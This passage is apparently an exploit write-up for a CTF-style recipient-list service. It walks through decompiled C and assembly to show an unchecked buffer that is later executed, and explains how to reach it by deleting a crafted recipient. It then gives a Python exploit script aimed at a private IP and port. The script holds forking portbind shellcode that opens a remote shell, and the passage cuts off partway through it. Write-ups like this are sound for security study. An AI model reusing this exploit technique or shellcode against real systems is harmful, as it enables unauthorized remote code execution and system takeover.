<div class="cpp" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><span class="fullpost"><span class="fullpost"><span style="font-size: small;">mprotect</span><span style="color: green; font-size: small;">(</span><span style="color: green; font-size: small;">(</span><span style="color: blue; font-size: small;">void</span><span style="font-size: small;"> </span><span style="color: #000040; font-size: small;">*</span><span style="color: green; font-size: small;">)</span><span style="color: green; font-size: small;">(</span><span style="color: #000040; font-size: small;">-</span><span style="font-size: small;">v12 </span><span style="color: #000040; font-size: small;">&</span><span style="font-size: small;"> </span><span style="color: green; font-size: small;">(</span><span style="color: blue; font-size: small;">unsigned</span><span style="font-size: small;"> </span><span style="color: blue; font-size: small;">int</span><span style="color: green; font-size: small;">)</span><span style="font-size: small;">s2</span><span style="color: green; font-size: small;">)</span><span style="font-size: small;">, </span><span style="color: green; font-size: small;">(</span><span style="color: green; font-size: small;">(</span><span style="color: blue; font-size: small;">unsigned</span><span style="font-size: small;"> </span><span style="color: blue; font-size: small;">int</span><span style="color: green; font-size: small;">)</span><span style="color: #000040; font-size: small;">&</span><span style="font-size: small;">s2</span><span style="color: green; font-size: small;">[</span><span style="font-size: small;">v12 </span><span style="color: #000040; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">283</span><span style="color: green; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #000040; font-size: small;">&</span><span style="font-size: small;"> </span><span style="color: #000040; font-size: small;">-</span><span style="font-size: small;">v12</span><span style="color: green; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #000040; font-size: small;">-</span><span style="font-size: small;"> </span><span style="color: green; font-size: small;">(</span><span style="font-size: small;">_DWORD</span><span style="color: green; font-size: small;">)</span><span style="font-size: small;">addr, </span><span style="color: #0000dd; font-size: small;">7</span><span style="color: green; font-size: small;">)</span><span style="color: teal; font-size: small;">;</span></span></span></div><span class="fullpost"><span class="fullpost"><br />
7 means EXEC+WRITE+READ. What I've done first, is patch this value to 3.<br />
Next interesting place is filling protected buffer with code.<br />
<br />
</span></span><br />
<div class="c" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><span class="fullpost"><span class="fullpost"><span style="font-size: small;">v15 </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">260</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;">i </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;">s2</span><span style="color: #009900; font-size: small;">[</span><span style="color: #0000dd; font-size: small;">260</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">-</span><span style="color: #0000dd; font-size: small;">52</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #339933; font-size: small;">++</span><span style="font-size: small;">i</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">v15</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> 0x82474FFu</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;">i </span><span style="color: #339933; font-size: small;">+=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">4</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">v15</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> 0x82454FFu</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;">i </span><span style="color: #339933; font-size: small;">+=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">4</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">v15</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> 0xC304C483u</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;">i </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #b1b100; font-size: small;">while</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">2</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #009900; font-size: small;">{</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">if</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> read</span><span style="color: #009900; font-size: small;">(</span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">ptr</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> 1u</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">{</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> s2</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> ptr</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">if</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> ptr </span><span style="color: #339933; font-size: small;">!=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">124</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">{</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">++</span><span style="font-size: small;">i</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">continue</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">}</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> s2</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">}</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">break</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #009900; font-size: small;">}</span></span></span></div><span class="fullpost"><span class="fullpost"><br />
This buffer can be dissembled.<br />
<div class="asm" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><span style="color: #00007f; font-size: small; font-weight: bold;">push</span><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">dword</span><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">ptr</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small; font-weight: bold;">[</span><span style="color: #00007f; font-size: small;">esp</span><span style="color: #339933; font-size: small;">+</span><span style="color: blue; font-size: small;">0x8</span><span style="color: #009900; font-size: small; font-weight: bold;">]</span><br />
<span style="color: #00007f; font-size: small; font-weight: bold;">call</span><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">dword</span><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">ptr</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small; font-weight: bold;">[</span><span style="color: #00007f; font-size: small;">esp</span><span style="color: #339933; font-size: small;">+</span><span style="color: blue; font-size: small;">0x8</span><span style="color: #009900; font-size: small; font-weight: bold;">]</span><br />
<span style="color: #00007f; font-size: small; font-weight: bold;">add</span><span style="font-size: small;"> </span><span style="color: #00007f; font-size: small;">esp</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> </span><span style="color: blue; font-size: small;">0x4</span><br />
<span style="color: #00007f; font-size: small; font-weight: bold;">ret</span><span style="font-size: small;"> </span></div><br />
As you can see from this peace of code, that the no limits for adding values in s2 buffer. And also there is a possibility to write over own code to s2+260. But first of all we need to find a place where this buffer called. Note, that buffer size if 284. Last values are list entry's. Also, note, that, for adding and deleting recipients, necessary to add + in the first place and | as last symbol.<br />
<br />
Lets move to the '-' handler.<br />
<br />
<div class="c" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><span style="color: #b1b100; font-size: small;">for</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #993333; font-size: small;">char</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">**</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">recipients</span><span style="color: #009900; font-size: small;">[</span><span style="color: #0000dd; font-size: small;">276</span><span style="color: #009900; font-size: small;">]</span><span style="color: #339933; font-size: small;">;</span><span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">!=</span><span style="font-size: small;"> recipients</span><span style="color: #339933; font-size: small;">;</span><span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="color: #993333; font-size: small;">char</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">69</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span><br />
<span style="color: #009900; font-size: small;">{</span><br />
<span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">if</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">!</span><span style="font-size: small;">strcmp</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">s1</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> s2</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span><br />
<span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">{</span><br />
<span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="color: #993333; font-size: small;">void</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">__cdecl </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> </span><span style="color: #993333; font-size: small;">char</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">261</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">64</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> s2</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">69</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">280</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">70</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">70</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">276</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">69</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">if</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> debug </span><span style="color: #009900; font-size: small;">)</span><br />
<span style="font-size: small;"> fprintf</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">stderr</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> </span><span style="color: red; font-size: small;">"Recipient %s removed<span style="color: #000099; font-weight: bold;">\n</span>"</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> s1</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> free</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">s2</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">break</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">}</span><br />
<span style="color: #009900; font-size: small;">}</span></div><br />
As you can see.There is a call s2 + 261 in '-' handler, is the recipients exist in list.<br />
So. What's only needed is to put shellcode, as a recipent, to the buffer and then delete this reciepent. The one problem was to through away from strcmp function. For such purpose add 00 value as a first value. <br />
Then put shellcode and at the offset 261 put relative jmp to 260 bytes back. "\xe9\xf7\xfe\xff\xff". <br />
In my example I take Linux/x86 - forking portbind shellcode - port=0xb0ef(45295) - 200 bytes from <a href="http://shell-storm.org/shellcode/files/shellcode-553.php">Shell-Storm </a><br />
<br />
<div class="python" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"><span style="color: #ff7700; font-size: small; font-weight: bold;">import</span><span style="font-size: small;"> </span><span style="color: crimson; font-size: small;">socket</span><br />
<span style="color: #ff7700; font-size: small; font-weight: bold;">import</span><span style="font-size: small;"> </span><span style="color: crimson; font-size: small;">sys</span><br />
<span style="font-size: small;">HOST, PORT = </span><span style="color: darkslateblue; font-size: small;">"192.168.1.3"</span><span style="font-size: small;">, </span><span style="color: orangered; font-size: small;">9119</span><br />
<span style="font-size: small;">shell = </span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>00"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c9<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>b1"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>06<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>b1<span style="color: #000099; font-weight: bold;">\x</span>01<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>b1<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>51"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>01<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>c1<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>50"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>68<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>ef<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>66"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e2<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>10<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>02"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>ca<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>66"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>39<span style="color: #000099; font-weight: bold;">\x</span>c3<span style="color: #000099; font-weight: bold;">\x</span>74<span style="color: #000099; font-weight: bold;">\x</span>05"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>40<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>50"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>04<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>cd"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>d7<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>31"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>c9<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>11<span style="color: #000099; font-weight: bold;">\x</span>b1<span style="color: #000099; font-weight: bold;">\x</span>01<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>cd"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>57"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>05<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>c6<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>02"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>39<span style="color: #000099; font-weight: bold;">\x</span>c3<span style="color: #000099; font-weight: bold;">\x</span>75<span style="color: #000099; font-weight: bold;">\x</span>40<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>fb<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>06<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c9<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>f3<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>3f<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>3f<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31"</span><br />
